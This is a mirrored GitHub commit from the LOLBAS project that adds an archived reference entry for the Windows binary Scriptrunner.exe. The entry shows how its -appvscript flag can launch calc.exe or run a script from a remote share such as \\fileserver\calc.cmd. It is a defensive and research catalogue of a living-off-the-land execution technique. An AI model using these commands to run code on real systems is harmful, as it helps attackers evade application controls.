mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-29 05:31:53 +02:00
Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
22
Archive-Old-Version/OSBinaries/Scriptrunner.exe.md
Normal file
22
Archive-Old-Version/OSBinaries/Scriptrunner.exe.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Scriptrunner.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Scriptrunner.exe -appvscript calc.exe
|
||||
Execute calc.exe.
|
||||
|
||||
ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||
Execute the calc.cmd script on the remote share.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||
* https://twitter.com/NickTyrer/status/914234924655312896
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\scriptrunner.exe
|
||||
* c:\windows\sysWOW64\scriptrunner.exe
|
||||
|
||||
* Notes: Thanks to Nick Tyrer - @NickTyrer
|
||||
|
Reference in New Issue
Block a user